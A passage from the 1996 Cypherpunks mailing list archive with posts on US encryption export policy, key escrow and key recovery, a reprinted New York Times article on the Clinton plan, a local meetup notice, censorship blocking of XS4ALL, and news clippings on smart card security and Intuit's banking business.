Or, attempt to make illegal interoperability with a product which would
have been illegal to export.

Thus, if Alice, in the U.S., uses a crypto product to communicate with Bob,
in a foreign country, and it "would have been illegal" for Bob to legally
receive the product, then Alice is presumed to be breaking some law (maybe
"conspircacy"...I'm not a lawyer) by sending messages Bob can read.

This is just vague speculation. But I think the government must be thinking
how they can finesse this point, how they can stop the current "crypto
anarchy" (in a different sense than I use it), where "rogue users" in
foreign countries are unreachable by U.S. law. The easiest way, of course,
is to go after U.S. persons or companies who intercommunicate with these
rogue users.

(Else what's to stop Giant Corporation from using Non-GAKked software
within the U.S., which is perfectly legal (under the "voluntary" system),
but then "happening" to have their foreign branches and customers obtain
"bootleg" versions at their end? All it takes is a single copy to get out,
and be duplicated a zillion times. Voila, interoperability, with the only
"crime" being the first export...which is essentially impossible to stop,
for so many reasons we mention so often. Conclusion: Government must make
this very mode illegal, perhaps by making it a conspiracy to thwart the
export laws....)


Any other ideas on how the government plans to enforce GAK, to make GAK the
overwhelmingly-preferred solution?

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 2 Oct 1996 05:41:39 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
Message-ID: <199610011706.NAA14852@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Hip Hip Hooray!  Clinton will finally let us use _some_
20+year-old encryption code, which has been known to be relatively
weak for 15 years, as long as we give them all our keys!  What a guy!

I assume he's partly doing this to make a big "See, I'm in favor
of high-tech trade and crime-fighting" push in time for the election,
and unlike RC4/40, cracking DES on general-purpose processors
_is_ a big enough job that probably can't do a distributed crack
in two weeks.  But still, get real - the NBS/NIST kept recertifying DES
every 5 years only because it was in widespread use and there weren't
good fast alternatives for the first couple of years (except triple-DES,
which on the computers of the time was annoyingly slow.)  
There were far more powerful systems like Diffie-Hellman and later RSA 
that were too slow for general use and are now fairly practical,
but they're not letting us use them....


>>Here we go again...from today's NYTimes...Clipper III
...
>That URL is http://www.nytimes.com/library/cyber/week/1001code.html


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 2 Oct 1996 06:00:31 +0800
To: cypherpunks@toad.com
Subject: Re: ADJ_ust
In-Reply-To: <199609301350.NAA10824@pipe2.ny1.usa.pipeline.com>
Message-ID: <v0300780fae77110d6ed9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 PM -0700 9/30/96, Dale Thorn wrote:

>If they wanna bombard the net, fine.  Just as long as they don't use one
>of those HAARP gizmos, like the ground-penetrating radar, and turn it
>onto a wide area, so everyone in, say, San Jose loses all their hard
>disk info and floppy backups.  I don't know much about non-magnetic
>technology, and so I wonder what the options are for secure backup,
>short of buying an expensive safe or a spot in an underground vault?

It's remarkably hard to erase modern magnetic media. (High coercivity means
field strengths have to be high, and magnetic heads are typically very
close to the media.)

No HERF, HAARP, or other Buck Rogers gizmo is going to even partially erase
floppy disks, let alone Winchester disks inside cases (their own cases,
plus the  outer enclosures). RF leakage is not at all the same thing as
kiloguass magnetic fields (and, more critically, the flux reversals per
unit length).

What the damage vectors might be, such as electrostatic discharge
("sparks"), or dielectric breakdown of oxides, or latchup, are covered in
various conferences, such as the Nuclear and Space Radiation Effects
Conference.

Personally, I think there's a lot of hype about this whole "infowar" thing.
Sure, security measures and vulnerabilities always need to be looked at,
but a lot of the rhetoric is being driven by journalists looking for lead
stories.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Claborne <claborne@CYBERTHOUGHT.com>
Date: Wed, 2 Oct 1996 06:29:54 +0800
To: mthompso@qualcomm.com
Subject: San Diego CPunk Physical meeting Thursday
Message-ID: <2.2.32.19961001173814.002f2928@cyberthought.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


<<<<< NOTE! I have a new address!!! >>>>>>

This Thursday!!!

San Diego Area CPUNKS symposium  Thursday, Oct. 3, 1996.

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  We discuss cryptography and other related subjects, have
the special cypherpunk dinner, and unwind after a long day at the grind stone.

   Don't forget to bring your public key  fingerprint.  If you can figure out
how to get it on the back of a business card, that would be cool.  If you want
the suspicious crowd there to sign your key, bring two forms of ID.

   Michelle is going to bring her PGP fingerprint in for signature.  Can you
believe it?

   Hopefully Lance Cottrell will give us an update on Mixmaster and what's going
on at San Diego's best ISP.  

   You can also get the scoop on the latest development of my job situation
(hint, some people are getting free eats from me on Thurs).  

   
Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer + wine.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend... 

NOTE: My primary e-mail address has changed to use my own domain.  You can 
reach me at "claborne@cyberthought.com". Permanently replace any other address
that you may have for me.  I am currently not subscribed to the CP list since
my current internet connection is slow (I can't afford anything right now :)

      2
  -- C  --



-----BEGIN PGP SIGNATURE-----
Version: 4.0 Personal Edition

iQEVAgUBMlFWioP1MBWQ+9udAQFx4wf/XYFLdsCzyCuIAHyswaKLxZWVgbj8lZiZ
0uxh1kv6SY0BW1UVrz5Fi9mkqcfy8D1t70VZj2BfxsEcVPSWKoaBaZA/NJaKyt29
UYHleHz00bkzesSKyJpZ6TSGFgG765okgG3xI3Q/93IbgiZxDzbmYvDGGsYLO9FY
0RSageZaeSALZgZxCQkG64EwChTqolJgBPpLS8Fv3kDEM96aA6d2zfip6nhgSYYR
+omBwcmGU2Y+kG+LAtV7YxAm7VFHSPy5FvmETcDDWH8+IbSECGgtJIvFFanIxk1F
LmJjgjfzgr9vpM/3CAuX4ar/WrffLuyZxGXH49fWDzht9o4ayb94xw==
=jEwG
-----END PGP SIGNATURE-----
                              ...  __o
                             ..   -\<,
Claborne@CYBERTHOUGHT.com    ...(*)/(*)._ Providing thoughts on 
					  your computing needs.
http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.  PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 2 Oct 1996 03:21:34 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <324FD588.3FF2@gte.net>
Message-ID: <Pine.LNX.3.95.961001105928.27216D-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   The database is just for genealogical stuff and church papers.


On Mon, 30 Sep 1996, Dale Thorn wrote:

> On the below: Gentiles (and Jews) are *very* afraid of Mormons.  Maybe 
> it has something to do with the World's Largest Database (on non-Mormons 
> especially) they keep under that mountain near SLC Utah.
> 
> Moroni wrote:
> > I never cease to be surprised by the interest that gentiles show  in
> > working mormon communities while totally neglecting their own failing
> > areas.
> 
> > On Sun, 29 Sep 1996, Timothy C. May wrote:
> > > (I received this message, with "cypherpunks@sybase.com" as well as
> > > "tcmay@sybase.com" (???) cc:ed, so I assume this message was intended for
> > > the Cypherpunks list, with some sybase domain name weirdness, or reflector,
> > > going on.)
> 
> > > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
> > > >I guess that depends on your definition of liberty.  The Mormons
> > > >originally moved there to have a place to practice their religion,
> > > >and have freedom from persecution.  I suppose one could extend that
> > > >to wanting a place to have the freedom to have a set of rules consistant
> > > >with their beliefs.  Should that include freedom from interferance from
> > > >folks such as yourself who want to change their rules, even though
> > > >you're not presently effected?
> > >
> > > Well, if Utah can rig a way to _secede_ from the Union, your arguments
> > > would make more sense. But so long as they are part of these United States,
> > > their religious beliefs about when children should be at home cannot
> > > supersede basic liberties.
> 
> [additional text deleted]
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 2 Oct 1996 07:55:43 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Mailmasher
In-Reply-To: <199610010403.VAA04509@dfw-ix6.ix.netcom.com>
Message-ID: <199610011803.LAA00754@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Note that hotwired has a policy where employees may setup
their own machiens outside the firewall for pet projects. This
may/maynot be one of them.

-- 
Sameer Parekh					Voice:   510-986-8770
C2Net						FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 2 Oct 1996 03:25:16 +0800
To: John Fricker <jfricker@vertexgroup.com>
Subject: RE: Utah as a Religious Police State [RANT]
In-Reply-To: <19960930201822898.AAA128@dev.vertexgroup.com>
Message-ID: <Pine.LNX.3.95.961001110227.27216E-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    The mountain is not for the public . Not even mormon public. The
records are.The mountain merely contains dup0licates of everything so in
the event of a nuclear devastation the church could paste things together
again. People can submit whatever they wnat to the records including wills
and trusts and stuff ,but that has nothing to do with the gentile
community at large . i can only think of the microfilms containing a
gentile will if that gentile wanted one.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SPG <tank@xs4all.nl>
Date: Tue, 1 Oct 1996 19:05:44 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Tools for Rendering Censorship Firewalls Ineffective
In-Reply-To: <199610010544.WAA11355@dfw-ix6.ix.netcom.com>
Message-ID: <3250FB83.1CFF3B8D@xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:

> That's trivial - most web server software is happy to use ports
> other than 80 if you tell it to, and it's not uncommon to see
> web servers running on ports 8000 or 8080, especially if they're
> run by regular users rather than root (which you need for port 80
> on many Unix systems.)  Does anybody know if the German ISPs were
> blocking XS4ALL's IP address just on port 80, on all ports, or on all but 25?

First they only blocked the IP-number of the web-server. After a while
they blocked 2 complete C-networks because xs4all changed the IP-number
of the webserver every half an hour.

At this moment they don't block anymore after we removed the radikal 154
temporary from xs4all. After they stopped blocking xs4all we've put the
issue back online of course :) We are now aiting what they will do next.
Either stop this censorship or block all +60 mirrors.

henk (SPG)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 2 Oct 1996 03:33:42 +0800
To: cypherpunks@toad.com
Subject: mormons questions
Message-ID: <Pine.LNX.3.95.960930090707.20673A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   I have no desire to make this a mormon list so any additional questions
can be answered by me at 1-717-343-2365. Intelligent questions only.
                       moroni






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 07:44:31 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: How might new GAK be enforced?
In-Reply-To: <v0300780dae77032b2bdd@[207.167.93.63]>
Message-ID: <Pine.3.89.9610011151.A4746-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, Timothy C. May wrote:
> Any other ideas on how the government plans to enforce GAK, to make GAK the
> overwhelmingly-preferred solution?

I am not certain that the USG has to make interoperable software illegal. 
It simply can withhold export licenses for products that allow such 
interoperability. That might go a long way to incentivizing industry to 
cooperate. But I would not at all be surprised if they took stronger 
measures.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Donald Weightman <dweightman@radix.net>
Date: Wed, 2 Oct 1996 04:58:52 +0800
To: e$cypherpunks@toad.com
Subject: Where to find some papers on the the information economy?
Message-ID: <199610011522.LAA28496@news1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


The "World Economy Survey" in the Current ECONOMIST makes some interesting
points about the intractabilty of the information-based economy to
traditional manufacturing-based econometrics, which looks at things like
industrial outputs as the basis for forecasting, and, not least,
macroeconomic policy. The gist of it is that the older measures overweight
the more traditional transactions -- production & sale of widgets and ingots
-- and undercount digital economic activity -- writing code, for example --
because no one knows how to measure the latter.

The implications for the political control of cybercommerce are pretty
striking -- how can a government control -- using the traditional blunt
instruments like fiscal and monetary policy -- sectors it cannot see,
measure, or quantify?

Anyway, the ECONOMIST Survey cites a couple of papers I'd like to see:

Charles Goldfinger; "The Intangible Economy and its Implications for
Statistics and Statisticians". Eurostat -- ISTAT seminar, Bologna, Feb. 1996

Danny Quah; "The Invisible Hand and the Weightless Economy". LSE Centre for
Economic Performance,  occasional paper No. 12, April 1996.

I ran some Web searches with null results. Does anyone know how I can get
these quickly?

Thanks, and apologies if the cross-posting is burdensome.

Don Weightman
dweightman@radix.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 10:18:53 +0800
To: stewarts@ix.netcom.com
Subject: Re: Clipper III on the table
In-Reply-To: <199610011706.NAA14852@attrh1.attrh.att.com>
Message-ID: <Pine.3.89.9610011137.A18896-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996 stewarts@ix.netcom.com wrote:

> Hip Hip Hooray!  Clinton will finally let us use _some_
> 20+year-old encryption code, which has been known to be relatively
> weak for 15 years, as long as we give them all our keys!  What a guy!

Note that the second article stated that the administration will allow 
the use of stronger cypto than 56 bit once GAK is in place. If this is 
true, much of the current industry resistance is likely to evaporate. 
Even the promise might suffice.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 2 Oct 1996 10:40:09 +0800
To: remailer-operators@c2.org
Subject: new mailing list: solving spam problem
Message-ID: <199610011904.MAA24104@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


a new list dedicated to trying to solve the problem of spam
just popped up, and may be of interest to some here--


------- Forwarded Message

Date: Mon, 30 Sep 1996 16:01:08 -0400 (EDT)
From: Chris Rapier <rapier@psc.edu>
To: ietf@IETF.CNRI.Reston.VA.US
Subject: Anti-Spam BOF Mail List

I've decided to take some initiative and set up a real mailing list for 
the discussion on spamming. I would like to see us take some sort of 
action at the next IETF and maybe get some rough ideas about what is 
and/or isn't possible in dealing with this problem. 

If you would like to join the mailing list send mail to

   majordomo@psc.edu

with

   subscribe spam-list [prefered address]

in the body. 

If you have any problems subscribing let me know. Also, this mailing list 
superceeds the one I set up and announced around an hour ago. Anyone who 
has alrteady sent requests to that mailing list will be added to this new 
one.

Chris Rapier
Senior Sysadmin/Cabin Boy 2nd Class
Pittsburgh Supercomputing Center
MI 230B


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Wed, 2 Oct 1996 04:51:36 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: active practice in America
Message-ID: <199610011620.JAA24487@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 PM 9/30/96 -0800, Tim May wrote:

>As for the historical reasons for the "conspiracy to not take seriously the
>civil rights of an aggrieved minority" nonsense, isn't it about time to
>roll back such laws? Whatever the putative justification for such things
>might have been 30-40 years ago, this is now, that was then.


"this is now, that was then"

This is the same same argument used by those who wish to revise and limit
the First Amendment.

mjw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 2 Oct 1996 05:22:51 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Export laws don't just affect crypto
In-Reply-To: <Pine.3.89.9610010807.A12171-0100000@netcom9>
Message-ID: <199610011632.MAA01864@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> > Umm, so are you violating ITAR if you *use* these GPS-guided missiles
> 
> No you aren't. A little known provision in the ITAR excempts exports 
> by missile. Seriously.

Well, not quite -- it exempts exports by space launch, but I think
thats intended for things like satelite launchings and not for things
like missile attacks against other countries...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ratak (Jason E.J. Manaigre) <ratak@escape.ca>
Date: Wed, 2 Oct 1996 05:50:38 +0800
To: cypherpunks@toad.com
Subject: Crypto Boundries
Message-ID: <199610011740.MAA29535@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Oct 01 12:38:37 1996

Hello All...

A few questions here...

The idea of a Crypto programming division has been tossed around over here, and was wondering...



        Does anyone have any serious hard facts on what crypto is allowed in which countries?

        How about Crypto development within Canadian Boundaries, are there any limits/concerns?

        Are any of the Crypto systems subject to different laws i.e 3Des/IDEA/MD5/Blowfish etc.?





Later


___________________________________________________________________
GarGoyle Securities
- -Intrusion Assessment Systems
- -Security Consultation/Education/Curriculum Development
- -Project Management/Research/Analysis World Wide...
- -Member of CITDC (Canadian International Trade Development Council)
- -Email 1: <ratak@escape.ca> Jason E.J. Manaigre
- -Email 2: <ratak@GargSec.mb.ca>
- -Email for PGP key with phrase 'Get Public Key' as Subject
- -2048 PGPKey iD E2 FA 30 E5 F5 AD EC F3  00 9A 9D 33 59 FC DF AD
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMlFXIfqtmO8M92GRAQF2tgf/aZ1bATXGeE8jK309T1gcnl25cogE0I0a
pO1hAtgtBedSO56XBas0bwhJD5tWeNuR46uQNKNH3hX7MeJN1wAKGg5o7sBsf4k0
J1ApRTXt2DsbELkYdIkcMVsTf1W40AimormYDKq2DPqSg7b9C1n1vQe/uDkDxDN3
aT/MOl7YLH1d31TffF7zwOLmcs1d0qZ8n0w//QcGwOI9l1Q2i0hc98DW6qYwdpJG
Zg+rZzt7jWJxICufh43AABs3j1X7FBsN+g0zBVrLmBK+I55/cHoxAg0uK+b1umTJ
eetc2GyjtO3H7uzpFDBZLJ3bTamm9nyA6fmYgjKm0dXpfYPlR5UBpw==
=BjRl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 2 Oct 1996 02:07:00 +0800
To: cypherpunks@toad.com
Subject: NYT on New GAK
Message-ID: <199610011242.MAA07002@pipe2.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, October 1, 1996, pp. D1, D2. 
 
 
   Accord Near On Computer Security Codes 
 
      'Key' System Required For Law Enforcement 
 
   By David E. Sanger 
 
 
   Washington, Sept. 30 -- After several years of debate 
   between the computer industry and American intelligence 
   agencies, President Clinton has decided to permit American 
   computer companies to export more powerful data-scrambling 
   software but only if they establish a system that will 
   enable keys to the code to be obtained by law enforcement 
   officials with a court warrant. 
 
   Administration officials, speaking on the condition of 
   anonymity, said Mr. Clinton reached his decision late last 
   week and that Vice President Al Gore would announce it on 
   Wednesday or Thursday. 
 
   Several big computer companies, led by the I.B.M., have 
   agreed to the new system, but many others, which have 
   opposed past proposals by the Administration for data- 
   scrambling policies, are likely to object. 
 
   Many American computer and software executives have long 
   argued that United States export controls on the most 
   sophisticated data-privacy technology put American industry 
   at a disadvantage versus products sold by their foreign 
   competitors. 
 
   But the Clinton White House, like previous Administrations, 
   citing national security issues and fears of foreign 
   terrorists or criminals, is loath to permit the export of 
   some of the most powerful data-scrambling software. The 
   reason has chiefly been that intelligence agencies feared 
   such equipment would be used by foreign terrorists, drug 
   cartels and other criminals to hide transactions and 
   communications. 
 
   Now, in a compromise, according to two senior officials in 
   the Administration who have been deeply involved in the new 
   policy, American companies will be permitted on Jan. 1 to 
   export software that encrypts, or scrambles, data using 
   "keys" -- lengthy numeric codes -- that are up to 56 bits 
   long. Until now, companies have been prohibited from 
   selling products abroad that have keys longer than 40 bits. 
 
   Mr. Clinton has also decided to move the authority for 
   exporting the encryption software from the State 
   Department, which has had export-licensing authority 
   because the technology has been classified as munitions, to 
   the Commerce Department, which controls the export of 
   products that have both commercial and military use. 
   Industry officials have long urged that change, betting the 
   Commerce Department would be more inclined to give a higher 
   priority to American competitive interests. 
 
   But starting in two years, American companies choosing to 
   export the more sophisticated software would have to set up 
   what the industry is calling a "key recovery" system. That 
   system would enable intelligence officials and law 
   enforcement agents, armed with court warrants, to go 
   through a lengthy multi-step process that would give them 
   the mathematical key to decoding scrambled communications. 
 
   The approach replaces the Administration's earlier proposed 
   "key escrow" system in which the Government would have been 
   the repository of the numeric keys -- leading to fears of 
   potential Government abuse, or a reluctance by legitimate 
   foreign users to buy the software. 
 
   Under the new plan, the keys may be held by third-party 
   companies. And large institutions, like banks may be 
   allowed to hold their keys in escrow -- assuming they pass 
   some kind of Government certification. 
 
   Still, the success of the system will depend on large part 
   on the Administration's efforts to persuade other countries 
   to adopt the same "key recovery" system, allowing their 
   intelligence agencies and justice systems to cooperate in 
   trailing criminals across national borders. But Mr. 
   Clinton's aides acknowledged today that this process has 
   just begun, and so far only England and France have 
   expressed much enthusiasm. 
 
   "It is going to take a while to persuade people that their 
   data is safe under this system, that it protects privacy, 
   and yet that we can use the system to trace terrorists or 
   drug dealers," one senior Administration official said. 
 
   Officials at I.B.M., which is expected to announce on 
   Wednesday the creation of an industry consortium to aid in 
   establishing the "key recovery" system, said today that no 
   single entity would hold the entire key. 
 
   Instead, it will be divided up across several companies 
   that would handle any given message, much the way the 
   launching officials in nuclear missile silos each had only 
   part of the key instructions needed to begin a nuclear 
   attack. 
 
   If the C.I.A., for example, obtained a court order to 
   decode a message, it would have to go to several groups 
   with its warrant to piece together the key. 
 
   "We believe that this solves the, biggest weak point in the 
   previous plans, where one entity held the key," said an 
   I.B.M. official familiar with the company's announcement. 
 
   But these steps are not likely to silence all the critics. 
 
   "There is still a perception that the U.S. is trying to 
   extend its intelligence capability by setting standards 
   around the world," said Marc Rotenberg, director of the 
   Electronic Privacy Information Center. 
 
   There are other potential holes in the system. Customers in 
   the United States will be free to buy encryption software 
   of any complexity -- as they can today -- with keys that 
   are much longer than 56 bits and are nearly impossible to 
   break. That means terrorist groups or drug dealers could 
   still buy such software and sneak it out of the country, or 
   even transmit it over computer networks. 
 
   "There is nothing we can do about bright students or Joe 
   Terrorist who use sophisticated encryption systems to 
   communicate with each other," one senior administration 
   official said. "But when they brush up against legitimate 
   groups, especially banks," the official said, "then they 
   are more likely to be dealing with a system" where law 
   enforcement could use the key recovery system to decode the 
   communications. 
 
   On Capitol Hill, several bills had been pending that would 
   lift all export controls on encryption software, but the 
   legislation did not move as the current session of Congress 
   wound down. In Congressional testimony last week, Jamie S. 
   Gorelick, Deputy Attorney General, said lifting all export 
   controls would "undermine our leadership role in fighting 
   international crime and damage our own national security 
   interests." 
 
   [End] 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 2 Oct 1996 11:40:43 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <kyR5uD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


News Release (Smart Card Forum): Friday, September 27, 1996

Consumers Can Be Confident in Smart Card Security

TAMPA, Fla. -- Two scientists at Bellcore announced a theoretical model for
penetrating the security of smart cards and other tamperproof devices. It is
important to point out that this is just a mathematical theory.

The Smart Card Forum does not believe that this theoretical attack presents a
real-world risk. Multiple techniques are used together to make the entire
system secure. And good systems are designed so that they cannot be attacked
successfully at a single point. Even if a single card could be compromised,
though unlikely, it would not compromise an entire system nor allow the
production of counterfeit cards.

That is not to say that Bellcore's work is not useful. In fact, the Smart Card
Forum encourages this type of healthy speculation because of the importance of
ensuring that all security issues be considered, analyzed and resolved as
early in the product design as possible.

For a smart card product to be successful, consumers must have confidence in
its security. The Bellcore research should not be perceived in any way as
diminishing the security of smart card products consumers are now using. The
smart cards used in North American stored value trials today are not
vulnerable to this theoretical attack.

The Smart Card Forum

The Smart Card Forum is a non-profit, multi-industry membership organization
promoting the widespread acceptance of multiple application smart card
technology in North America. Its primary mission is to bring together in an
open forum, leaders from both the private and public sectors to address topics
associated with the development and evolution of smart card technology
applications.

The Forum was established in September 1993 and currently has more than 225
corporate and government members including: Chase Manhattan, Citibank,
Bellcore, MCI, MasterCard, Visa, IBM, Microsoft, Mobil Oil, Schlumberger,
Gemplus, Delta Airlines, U.S. Postal Service, the Federal Reserve, U.S.
Department of Treasury and U.S. Department of Defense.


Dow Jones: Friday, September 27, 1996

Chase Says Findings Won't Halt NYC Smart Card Plan

A potential security flaw in electronic cash cards found by Bellcore
scientists will have no effect on a pilot program to test the cards in New
York City early next year, a leading bank involved in the program said.

Chase Manhattan Corp. (CMB) spokesman Ken Herz - speaking on behalf of a
consortium that includes Citicorp (CCI), Visa International and MasterCard
International Ltd. - said Bellcore's warnings won't hinder the roll-out of the
pilot program.

''The industry is well aware of the vulnerabilities of the system,'' Herz
said, adding that the consortium members have discussed the potential problems
''for months now.''

Herz said the consortium is planning to test the cards during the first
quarter of 1997 with about 50,000 Chase and Citicorp customers on the Upper
West Side of Manhattan.


American Banker: Friday, September 27, 1996

Why Intuit Pulled Plug on Home Banking Processing

By DREW CLARK

Intuit Inc., which boasts of being able to turn on a dime, proved it could
with its decision to get out of the processing of home banking transactions.

An acquisition that looked so smart just two years ago turned into an
albatross. When 40 top executives gathered at Mountain View, Calif.,
headquarters last month to determine the fate of Intuit Services Corp., the
answer quickly became evident.

As was announced last week, Checkfree Corp. agreed to buy the unit for $228
million in stock.

"We have always anticipated this change, but we did not anticipate that it
would come so fast," said Intuit executive vice president William H. Harris.

Intuit bought the Downers Grove, Ill., processor, then known as National
Payment Clearinghouse Inc., for $6.8 million in 1994. Overnight, Intuit
established itself as the leader in handling transactions emanating from
PC-based financial management programs.

By this year, though, bankers have been complaining loudly about service
quality and worrying aloud that Intuit wants to control their relationships
with users of its popular Quicken software. Complicating matters for Intuit,
as it was dealing with rapid growth in transaction volume this year, was a
flurry of new entrants -- banks as well as software companies -- into the home
banking market.

The Intuit executives knew they had to take action. Should they add to the
more than $30 million already spent on Intuit Services, or cut their losses
and refocus on the core software business? "We put up on a board a list of the
highest priorities that we wanted to address," Mr. Harris said. "The list was
overwhelming."

Besides home banking and bill payment, the company envisioned itself
connecting customers to mutual funds, insurance, and tax preparation as well
as facilitating bill presentment and electronic commerce.

It became obvious to the executives that ownership of Intuit Services was not
helping them to meet those priorities.

"By the end of the process, there was close to complete unanimity," said Mr.
Harris, who reports to chief executive William V. Campbell. "A number of
people changed or modified their points of view. There were those who argued
we could innovate faster by continuing to do every part of the chain."

Once they decided to sell Intuit Services, the software company's leaders
moved on the issue of openness. "We needed many people to help us," Mr. Harris
said, "and one of the ways to get other people to help us was to open up our
system."

Along with the announcement of the sale, Intuit said it would decouple its
financial software from the back-end processing network to be owned by
Checkfree. No longer would banks be forced to use the facility for back-end
processing and bill-paying work.

Under a new regime called OpenExchange, Intuit promised to release software
specifications by the end of the year. Banks and other financial institutions
will be able to offer customers on-line access to Intuit products regardless
of their payment processor.

Mr. Harris said the decision "frees us up to concentrate on the front-end
software and allows us to find appropriate partners" for back-end processing.
But he added, "one of the disadvantages of an open approach is that you depend
upon your partners."

"This decision underscores the trend toward open standards in on-line
financial services," said Marc Singer, a consultant with McKinsey & Co. in San
Francisco. "It also illustrates the importance of collaborating to compete. In
an uncertain environment you have to stake out positions and continually
revisit them."

Securities analysts also praised the evaluation of Intuit Services Corp. as "a
drag on earnings. Intuit wants to hold on to the lead, and this will make
Intuit more appealing to the large banks," said Steve Higgens of Bear Stearns
& Co. in San Francisco.

Although Intuit's move toward open software came just a week after the
bank-owned Integrion Financial Network emphasized its own "open standards,"
Intuit officials insisted that the timing was coincidental.

Quicken 6.0 for Windows is scheduled for release in October. The 1997 version
will be the first to comply to the OpenExchange standard, Mr. Harris said.
"We've done a lot in a hurry."

He expressed no regret about the company's two-year experiment in payment
processing, saying Intuit technicians had learned much by establishing
back-end connections to banks and bringing many customers into the home
banking field.

"When we purchased National Payment Clearinghouse, the only viable way to
connect securely with large numbers of consumers was through a private network
and on a central hub," said Mr. Harris.

